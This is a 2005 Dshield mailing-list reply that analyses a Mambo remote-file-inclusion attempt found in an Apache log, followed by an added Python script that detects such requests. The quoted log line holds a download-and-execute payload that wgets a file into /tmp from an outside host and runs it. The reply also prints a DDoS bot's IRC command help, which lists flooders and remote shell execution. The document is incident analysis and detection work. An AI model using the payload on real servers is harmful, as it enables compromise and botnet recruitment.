[Dshield] Can Someone Decipher This Log Entry?

Stephane Grobety security at admin.fulgan.com
Thu Dec 22 10:30:34 GMT 2005


Hello David,

I've masked part of the IP you provided in your message, just in case.
It's a bit silly considering you didn't do the same, but, well, it does
no additional harm...

It looks like this is an attempt to exploit a flaw in the Mambo
content management software (looks like it's this one:
http://secunia.com/advisories/14337/).

If the exploit succeeds, it will try to wget a file called "micu" from
XXX.136.48.69 into the /tmp folder and execute it.

At this moment, that server is still serving the file so I checked it.
What it does is try to download and execute two more files: "mare" and "ro".

"mare" isn't available on the remote server but "ro" is. It looks like
an ELF executable. Now, I'm not a specialist of that file format so
I may be completely wrong here but this looks like a Linux x86
executable file. It seems to link the /lib/ld-linux.so.2 library and
import a bunch of functions that you expect from an IP server program.
It also contains a number of strings that indicate that it might try
to contact an IRC server (*.undernet.org). It also has a nice internal
help that is probably intended to be used by the attacker:

NOTICE %s :Current status is: %s.
NOTICE %s :Already disabled.
NOTICE %s :Password too long! > 254
NOTICE %s :Disable sucessful.
NOTICE %s :ENABLE <pass>
NOTICE %s :Already enabled.
NOTICE %s :Wrong password
NOTICE %s :Password correct.
NOTICE %s :Removed all spoofs
NOTICE %s :What kind of subnet address is that? Do something like: 169.40
NOTICE %s :Unable to resolve %s
NOTICE %s :UDP <target> <port> <secs>
NOTICE %s :Packeting %s.
NOTICE %s :PAN <target> <port> <secs>
NOTICE %s :Panning %s.
NOTICE %s :TSUNAMI <target> <secs>
NOTICE %s :Tsunami heading for %s.
NOTICE %s :UNKNOWN <target> <secs>
NOTICE %s :Unknowning %s.
NOTICE %s :MOVE <server>
NOTICE %s :TSUNAMI <target> <secs>                          = Special packeter that wont be blocked by most firewalls
NOTICE %s :PAN <target> <port> <secs>                       = An advanced syn flooder that will kill most network drivers
NOTICE %s :UDP <target> <port> <secs>                       = A udp flooder
NOTICE %s :UNKNOWN <target> <secs>                          = Another non-spoof udp flooder
NOTICE %s :NICK <nick>                                      = Changes the nick of the client
NOTICE %s :SERVER <server>                                  = Changes servers
NOTICE %s :GETSPOOFS                                        = Gets the current spoofing
NOTICE %s :SPOOFS <subnet>                                  = Changes spoofing to a subnet
NOTICE %s :DISABLE                                          = Disables all packeting from this client
NOTICE %s :ENABLE                                           = Enables all packeting from this client
NOTICE %s :KILL                                             = Kills the client
NOTICE %s :GET <http address> <save as>                     = Downloads a file off the web and saves it onto the hd
NOTICE %s :VERSION                                          = Requests version of client
NOTICE %s :KILLALL                                          = Kills all current packeting
NOTICE %s :HELP                                             = Displays this
NOTICE %s :IRC <command>                                    = Sends this command to the server
NOTICE %s :SH <command>                                     = Executes a command
NOTICE %s :Killing pid %d.

So what this looks like is a client for a DDoS botnet.

Other entries in the program seem to indicate it's been compiled on a
Debian system:

/home/drow/debian-glibc/

There is also something that looks very much like an HTTP request:

GET /%s HTTP/1.0
Connection: Keep-Alive
User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)
Host: %s:80
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8

It would be interesting to see if the request matches your log entry:
I think the above request is part of the exploit code.

I did a bit of Google research and found several DDoS clients that are
apparently based on the same code and contain the same string
literals.

That's all I can say about this... The attacker is still up and
running and probably still scanning networks trying to drop its
malware.

Good luck,
Stephane


Wednesday, December 21, 2005, 10:53:14 PM, you wrote:

DCH> I have about 25 of these today. I've added index2.php to the firewall watcher.
DCH> I cannot make sense of this Apache print:

DCH> 85.190.1.171 - - [21/Dec/2005:16:47:41 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://XXX.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20XXX.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 200 21 "-"




-- 
Best regards,
 Stephane                            mailto:security at admin.fulgan.com
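The log line David quoted is a Mambo remote-file-inclusion attempt: the query string points mosConfig_absolute_path at a remote host and carries a percent-encoded shell pipeline in cmd. Below is an added example (not code from the thread or from either poster) that scans Apache access-log lines for that pattern and pulls out the include host, the decoded commands and every host the payload tries to wget or curl from. The two sample log lines are constructed for the example: the first is modelled on the one in the thread with the attacker's address replaced by 192.0.2.10 (documentation range), the second is an ordinary PDF export of the same article and must not be flagged.

```python
"""Flag Mambo/Joomla mosConfig_absolute_path remote-file-inclusion attempts in
Apache access logs and extract the shell payload and its download hosts.

Added example, not code from the original mailing-list thread. Sample log
lines are constructed; hosts use the 192.0.2.0/24 and 198.51.100.0/24
documentation ranges.
"""
import re
from urllib.parse import unquote, urlsplit

# Apache "combined"-style access line: client, ident, user, [timestamp],
# "METHOD target protocol", status, size.  The protocol field is matched
# loosely because attack tools often send a mangled one.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# First argument handed to wget/curl inside the cmd payload.  ';', '|' and
# '&' end the argument because the payload uses them as shell separators.
FETCH_RE = re.compile(r'\b(?:wget|curl)\s+([^\s;|&]+)', re.IGNORECASE)


def split_query(target):
    """Split the request target's query string on '&' only (never on ';',
    which the payload uses as a shell separator) and percent-decode it.
    The first '?' starts the query; later '?' characters stay in values."""
    query = target.partition('?')[2]
    params = {}
    for pair in query.split('&'):
        if not pair:
            continue
        key, _, value = pair.partition('=')
        params[unquote(key)] = unquote(value)
    return params


def host_of(url):
    """Hostname of a URL; a bare 'host/path' as used by 'wget host/file'
    is treated as http."""
    if '://' not in url:
        url = 'http://' + url
    return urlsplit(url).hostname or ''


def analyze_line(line):
    """Return a dict describing the RFI attempt, or None for a normal line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    params = split_query(m['target'])
    abs_path = params.get('mosConfig_absolute_path', '')
    # Only a remote (URL-wrapper) value turns the include into an RFI;
    # a missing or local value is not an attempt.
    if not abs_path.lower().startswith(('http://', 'https://', 'ftp://')):
        return None
    cmd = params.get('cmd', '')
    commands = [c.strip() for c in re.split(r'[;|&\n]', cmd) if c.strip()]
    fetch_hosts = sorted({host_of(u) for u in FETCH_RE.findall(cmd)})
    return {
        'client': m['ip'],
        'timestamp': m['ts'],
        'status': int(m['status']),
        'include_host': host_of(abs_path),
        'commands': commands,
        'fetch_hosts': fetch_hosts,
    }


def scan(lines):
    """Run analyze_line over an iterable of log lines, keeping the hits."""
    return [hit for hit in (analyze_line(line) for line in lines) if hit]


# Constructed sample log (not David's real entries).
SAMPLE_LOG = [
    '198.51.100.7 - - [21/Dec/2005:16:47:41 -0500] "GET /index2.php?option=com_content'
    '&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS='
    '&mosConfig_absolute_path=http://192.0.2.10/cmd.gif?&cmd=cd%20/tmp;wget%20192.0.2.10/micu;'
    'chmod%20744%20micu;./micu;echo%20YYY;echo| HTTP/1.1" 200 21 "-"',
    '198.51.100.8 - - [21/Dec/2005:16:50:02 -0500] '
    '"GET /index2.php?option=com_content&do_pdf=1&id=1 HTTP/1.1" 200 5321 "-"',
]

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit['client'], hit['include_host'], hit['fetch_hosts'])
        for c in hit['commands']:
            print('   ', c)
```

The fetch hosts are what you would block or watch for outbound connections from the web server; the include host and the download host are the same in the thread's entry but need not be. A 200 on the request proves nothing by itself, since Mambo answers 200 whether or not the include worked, so the commands list is the better indicator of what to look for in /tmp.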


